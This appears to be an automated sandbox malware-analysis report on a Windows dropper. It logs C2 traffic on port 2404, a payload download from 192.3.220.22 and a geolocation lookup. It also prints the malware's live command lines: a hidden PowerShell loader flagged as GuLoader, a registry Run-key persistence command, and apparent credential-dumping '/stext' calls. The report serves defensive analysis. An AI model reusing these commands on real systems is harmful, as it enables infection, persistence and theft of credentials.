                                          Sep 30, 2024 14:00:59.711060047 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.712743998 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.717621088 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.721851110 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.725132942 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.743607998 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.745915890 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.750673056 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.751955032 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.752731085 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.753253937 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.753281116 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.755973101 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.756851912 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.756907940 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.757128000 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.757139921 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.757162094 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.757174015 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.757184982 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.758156061 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.758167982 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.758192062 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.758287907 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.760865927 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.792020082 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.797408104 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.798330069 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.798391104 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.807004929 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.815361023 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.816660881 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.818757057 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.818815947 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.820363045 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.820468903 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.820482016 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.820554972 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.820637941 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.820656061 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.820687056 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.821580887 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.821633101 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.821645021 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.821717978 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.824687004 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.834119081 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.839030981 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.876523018 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.877825022 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.880040884 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.881422043 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.881491899 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.881536961 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.881643057 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.881683111 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.881771088 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.881783962 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.882719994 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.882843971 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.882879972 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.882994890 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.884844065 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.918801069 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.923913956 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.925195932 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.928225994 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.928862095 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.928900957 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.929007053 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.929105043 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.929137945 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.929225922 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.929254055 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.930073023 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.930123091 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.930213928 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.930329084 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.933119059 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.969957113 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.970988035 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.972309113 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.975863934 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.975971937 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.976005077 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.976048946 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.976242065 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.976252079 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.976259947 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.976289988 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.977286100 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.977296114 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.977303982 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.977379084 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.980755091 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:59.990570068 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:59.995492935 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.006546021 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.011487007 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.040533066 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.129906893 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.286720037 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.288183928 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.291505098 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.306458950 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.307074070 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.307147026 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.307157040 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.307204962 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.308063984 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.308373928 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.308489084 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.308624029 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.308645964 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.308661938 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.308762074 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.308770895 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309245110 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309253931 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309262037 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309269905 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309278965 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309288025 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309294939 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309303999 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309317112 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309325933 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309329987 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309334993 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309338093 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309349060 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.309357882 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.342541933 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.396573067 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.430960894 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.435168028 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.438103914 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.439644098 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.440080881 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.443008900 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.443037033 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.443092108 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.443145990 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.443156004 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.443510056 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.443520069 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.444777966 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.445148945 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.445158958 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.445167065 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.445918083 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.450715065 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.536623955 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.542414904 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.553467035 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.556835890 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.558142900 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.558517933 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.561919928 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.562000036 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.562021971 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.562102079 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.562155008 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.562233925 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.562242985 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.563103914 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.563143969 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.563169956 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.563322067 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.568658113 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.573631048 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.584286928 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.589250088 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.600645065 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.606012106 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:01:00.613090992 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.614381075 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:01:00.615533113 CEST497412404192.168.2.4107.173.4.16
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 30, 2024 13:59:47.621788979 CEST | 192.168.2.4 | 1.1.1.1 | 0xc568 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 30, 2024 13:59:47.629160881 CEST | 1.1.1.1 | 192.168.2.4 | 0xc568 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 192.3.220.22 | 80 | 5916 | C:\Users\user\AppData\Local\Temp\Vaccinerende.exe

Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 13:59:43.071100950 CEST | 179 | OUT | GET /hFXELFSwRHRwqbE214.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 192.3.220.22
Cache-Control: no-cache
Sep 30, 2024 13:59:43.556668997 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 11:59:42 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Sun, 29 Sep 2024 22:47:51 GMT
ETag: "78c40-62349e0caa82a"
Accept-Ranges: bytes
Content-Length: 494656
Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 178.237.33.50 | 80 | 5916 | C:\Users\user\AppData\Local\Temp\Vaccinerende.exe

Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 13:59:47.637548923 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Sep 30, 2024 13:59:48.254547119 CEST | 1170 | IN | HTTP/1.1 200 OK
date: Mon, 30 Sep 2024 11:59:48 GMT
server: Apache
content-length: 962
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
                                          Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



                                          Target ID:0
                                          Start time:07:57:10
                                          Start date:30/09/2024
                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:1
                                          Start time:07:57:11
                                          Start date:30/09/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
                                          Imagebase:0x200000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.3360987921.000000000C608000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:2
                                          Start time:07:57:11
                                          Start date:30/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:07:59:21
                                          Start date:30/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 24%, ReversingLabs
                                          • Detection: 33%, Virustotal, Browse
                                          Reputation:low
                                          Has exited:false

                                          Target ID:9
                                          Start time:07:59:41
                                          Start date:30/09/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
                                          Imagebase:0x240000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:07:59:41
                                          Start date:30/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:11
                                          Start time:07:59:41
                                          Start date:30/09/2024
                                          Path:C:\Windows\SysWOW64\reg.exe
                                          Wow64 process (32bit):true
                                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
                                          Imagebase:0x670000
                                          File size:59'392 bytes
                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:12
                                          Start time:07:59:48
                                          Start date:30/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\lkcwddclh"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:13
                                          Start time:07:59:48
                                          Start date:30/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\omhpewnevqbu"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:14
                                          Start time:07:59:48
                                          Start date:30/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\yguhfoygjytgatk"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:15
                                          Start time:07:59:54
                                          Start date:30/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dpvrcfd"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:16
                                          Start time:07:59:54
                                          Start date:30/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\fsbcdyonhlh"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:17
                                          Start time:07:59:54
                                          Start date:30/09/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\qmgvdqygubzojv"
                                          Imagebase:0x400000
                                          File size:990'768 bytes
                                          MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:20
                                          Start time:08:01:03
                                          Start date:30/09/2024
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 892
                                          Imagebase:0xc00000
                                          File size:483'680 bytes
                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false


                                            Execution Graph

                                            Execution Coverage:24.7%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:21%
                                            Total number of Nodes:1353
                                            Total number of Limit Nodes:41
4239 4041e1 18 API calls 4237->4239 4240 404248 8 API calls 4238->4240 4241 404686 SetDlgItemTextW 4239->4241 4242 4046ab 4240->4242 4241->4238 4243 4027e9 4244 4027f0 4243->4244 4245 402a6a 4243->4245 4246 402c15 17 API calls 4244->4246 4247 4027f7 4246->4247 4248 402806 SetFilePointer 4247->4248 4248->4245 4249 402816 4248->4249 4251 406193 wsprintfW 4249->4251 4251->4245 4252 40166a 4253 402c37 17 API calls 4252->4253 4254 401670 4253->4254 4255 40658f 2 API calls 4254->4255 4256 401676 4255->4256 4257 401ced 4258 402c15 17 API calls 4257->4258 4259 401cf3 IsWindow 4258->4259 4260 401a20 4259->4260 3606 4053ef 3607 405410 GetDlgItem GetDlgItem GetDlgItem 3606->3607 3608 405599 3606->3608 3651 404216 SendMessageW 3607->3651 3610 4055a2 GetDlgItem CreateThread CloseHandle 3608->3610 3611 4055ca 3608->3611 3610->3611 3654 405383 OleInitialize 3610->3654 3613 4055f5 3611->3613 3614 4055e1 ShowWindow ShowWindow 3611->3614 3615 40561a 3611->3615 3612 405480 3617 405487 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3612->3617 3616 405655 3613->3616 3619 405609 3613->3619 3620 40562f ShowWindow 3613->3620 3653 404216 SendMessageW 3614->3653 3621 404248 8 API calls 3615->3621 3616->3615 3626 405663 SendMessageW 3616->3626 3624 4054f5 3617->3624 3625 4054d9 SendMessageW SendMessageW 3617->3625 3627 4041ba SendMessageW 3619->3627 3622 405641 3620->3622 3623 40564f 3620->3623 3632 405628 3621->3632 3628 4052b0 24 API calls 3622->3628 3629 4041ba SendMessageW 3623->3629 3630 405508 3624->3630 3631 4054fa SendMessageW 3624->3631 3625->3624 3626->3632 3633 40567c CreatePopupMenu 3626->3633 3627->3615 3628->3623 3629->3616 3635 4041e1 18 API calls 3630->3635 3631->3630 3634 40626e 17 API calls 3633->3634 3636 40568c AppendMenuW 3634->3636 3637 405518 3635->3637 3638 4056a9 GetWindowRect 3636->3638 3639 4056bc TrackPopupMenu 3636->3639 3640 405521 ShowWindow 3637->3640 3641 405555 GetDlgItem SendMessageW 3637->3641 3638->3639 3639->3632 3643 4056d7 3639->3643 3644 
